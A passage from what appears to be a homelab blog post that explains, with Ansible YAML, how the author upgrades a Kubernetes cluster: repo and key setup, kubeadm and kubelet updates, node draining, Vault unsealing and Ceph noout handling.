</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://pkgs.k8s.io/core:/stable:/{{ kube_version }}/deb/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update apt after kubernetes repos changed</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span></code></pre></div><p>These deploy the apt key of the <code>K8s.io</code> repo for the main Kubernetes components,
remove the repo of the previous version and add the repo of the new version.
Finally, an apt cache update is executed to fetch the packages from the new repo
before running any install tasks.</p>
<p>One thing to note here is that I&rsquo;m manually fetching the Kubernetes repo key
and storing it in the repo via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.31/deb/Release.key | gpg --dearmor -o roles/kube-common/files/kubernetes-keyring.gpg
</span></span></code></pre></div><p>The next step is updating the kubeadm version:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unpin kubeadm version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeadm</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">install</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update kubeadm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;kubeadm={{ kube_version_full }}*&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubeadm version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubeadm</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_kubeadm</span>
</span></span></code></pre></div><p>The <code>update_kubeadm</code> variable is necessary because I&rsquo;m running this role twice for control plane nodes.
Once updating only kubeadm on all CP nodes, and then again to run the kubelet
update. But that second run won&rsquo;t need to run the kubeadm update again, hence
why the <code>update_kubeadm</code> variable exists.</p>
<p>Next is the <code>kubeadm upgrade</code> invocation, the main part of the cluster update:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run kubeadm update</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cmd</span>: <span style="color:#e6db74">&#34;kubeadm upgrade node&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">not kube_first_node and update_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">run kubeadm update</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cmd</span>: <span style="color:#e6db74">&#34;kubeadm upgrade apply -y v{{ kube_version_full }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">kube_first_node and update_kubeadm</span>
</span></span></code></pre></div><p>There are two variants of this task, depending on whether <code>kube_first_node</code> is
set or not. This is necessary because only the first CP node updated needs to
run <code>upgrade apply -y v&lt;NEW_VERSION&gt;</code>. All other CP nodes and all non-CP nodes
just run <code>upgrade node</code>. Again, this setup using variables is mostly because
<em>in principle</em>, the update steps are the same for all nodes in the cluster. So
it made more sense to have one role where I could switch some tasks on/off, rather
than having multiple roles which each repeat a lot of their respective tasks.
The kubeadm update includes updating the control plane components: kube-apiserver,
kube-controller-manager and kube-scheduler as well as etcd. All of these are
static Pods, who&rsquo;s definition is controlled by kubeadm.</p>
<p>The next step is updating the kubelet and kubectl on the nodes, which is
headed by draining the node:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">drain node</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">argv</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">drain</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">delete-emptydir-data=true</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">force=true</span>
</span></span><span style="display:flex;"><span>      - --<span style="color:#ae81ff">ignore-daemonsets=true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span></code></pre></div><p>Here is the second variable I&rsquo;m using to restrict which tasks of the role are
executed for a particular host, the <code>update_non_kubeadm</code> variable. It indicates
that all tasks not related to the kubeadm update are to be executed.
This command is not issued on the node itself, but rather on my command and
control host, which also runs the Ansible playbook.</p>
<p>Then comes the update of cri-o:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove previous kube cri-o repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/libcontainers-crio-keyring.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://download.opensuse.org/repositories/isv:/cri-o:/stable:/{{ crio_version_prev }}/deb/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">libcontainers-crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39; and update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add libcontainers cri-o repo key</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#ae81ff">libcontainers-crio-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/usr/share/keyrings/libcontainers-crio-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0644</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add kube cri-o repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/libcontainers-crio-keyring.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://download.opensuse.org/repositories/isv:/cri-o:/stable:/{{ crio_version }}/deb/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">libcontainers-crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39; and update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update apt after cri-o repos changed</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">update_cache</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update cri-o</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">cri-o</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">cri-tools</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">autostart cri-o</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd_service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span></code></pre></div><p>This is similar to the initial Kubernetes repo setup. Please note that from
version 1.30 to 1.32, cri-o lived in the k8s.io repos, but was then moved to
openSUSE repos.</p>
<p>Once cri-o is updated, the last part of the role is updating kubectl and kubelet:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unpin kubelet version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">install</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update kubelet</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;kubelet={{ kube_version_full }}*&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubelet version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unpin kubectl version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">install</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update kubectl</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;kubectl={{ kube_version_full }}*&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pin kubectl version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dpkg_selections</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubectl</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">selection</span>: <span style="color:#ae81ff">hold</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">restart kubelet</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">systemd_service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kubelet</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">daemon_reload</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">restarted</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span></code></pre></div><p>And finally, the node is uncordoned:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">uncordon node</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubernetes.core.k8s_drain</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;{{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">uncordon</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">update_non_kubeadm</span>
</span></span></code></pre></div><p>This command is again delegated to my command and control host, which means the
command is not executed on the remote host by my Ansible user, but rather for
every host, the kubectl command is executed on a central host which has the
necessary permissions and keys to actually run kubectl against the cluster.</p>
<p>The role I&rsquo;ve described above is then used in a playbook running it against
the different groups of hosts in my Homelab. First is one of the control plane
hosts, running the required first <code>kubeadm upgrade apply -y &lt;NEW_KUBE_VERSION&gt;</code>
command, which only needs to be run on the first control plane node:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">firstcp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update first kubernetes controller kubeadm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-kubeadm-first</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">kube_first_node</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>Notably, this run gets the <code>kube_first_node</code> variable set, but doesn&rsquo;t run the
non-kubeadm updates, meaning the kubelet update, yet.
Next come the remaining control plane nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_controllers:!firstcp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update other kubernetes controllers kubeadm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-kubeadm</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>These nodes don&rsquo;t have the <code>kube_first_node</code> set, so they execute the <code>kubeadm upgrade node</code>
update command. Here, too, <code>update_non_kubeadm</code> is false, meaning the kubelets
are not updated yet. This is necessary because without this, there&rsquo;s a danger
that a kubelet that has already been updated would talk to a kube-apiserver which
hasn&rsquo;t yet been updated, potentially leading to errors.</p>
<p>After the kubeadm update follows the kubelet update for the controller nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_controllers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes controllers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-controllers</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">include cluster upgrade role</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">include_role</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-cluster-upgrade</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_kubeadm</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">update_non_kubeadm</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wait for vault to be running</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes.core.k8s_info</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Pod</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">label_selectors</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">app.kubernetes.io/name=vault</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#ae81ff">app.kubernetes.io/instance=vault</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">field_selectors</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;spec.nodeName={{ ansible_hostname }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">wait</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">wait_condition</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">status</span>: <span style="color:#e6db74">&#34;True&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Ready&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">wait_sleep</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">wait_timeout</span>: <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">register</span>: <span style="color:#ae81ff">vault_pod_list</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">unseal vault prompt</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">echo</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">prompt</span>: <span style="color:#e6db74">&#34;Please unseal vault: k exec -it -n vault {{ vault_pod_list.resources[0].metadata.name }} -- vault operator unseal&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pause for two minutes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">pause</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">minutes</span>: <span style="color:#ae81ff">2</span>
</span></span></code></pre></div><p>This runs the role with <code>update_kubeadm: false</code> but <code>update_non_kubeadm: true</code>,
leading to the kubeadm update being skipped as it was already run in the previous
play, and instead the kubelet is being updated. This is safe to do now, because
all kube-apiservers have been updated to the new version at this point.
I&rsquo;m running a two minute pause task at the end of each play, to give the cluster
a bit of time to start all Pods again.
This kubelet update step also contains some handling of my Vault containers, which
are running on the control plane nodes. They need to be manually unsealed
when they&rsquo;re restarted.</p>
<p>Next up are the Ceph nodes, which I do not throw together with the rest of the
worker nodes as they need to be run one at a time, to prevent storage downtime.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">kube_ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Update kubernetes Ceph nodes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">k8s-update-ceph</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serial</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>: <span style="color:#ae81ff">linear</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set osd noout</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">delegate_to</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">become_user</span>: <span style="color:#ae81ff">myuser</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">/home/myuser/.krew/bin/kubectl-rook_ceph --operator-namespace rook-ceph -n rook-cluster ceph osd set noout</span>
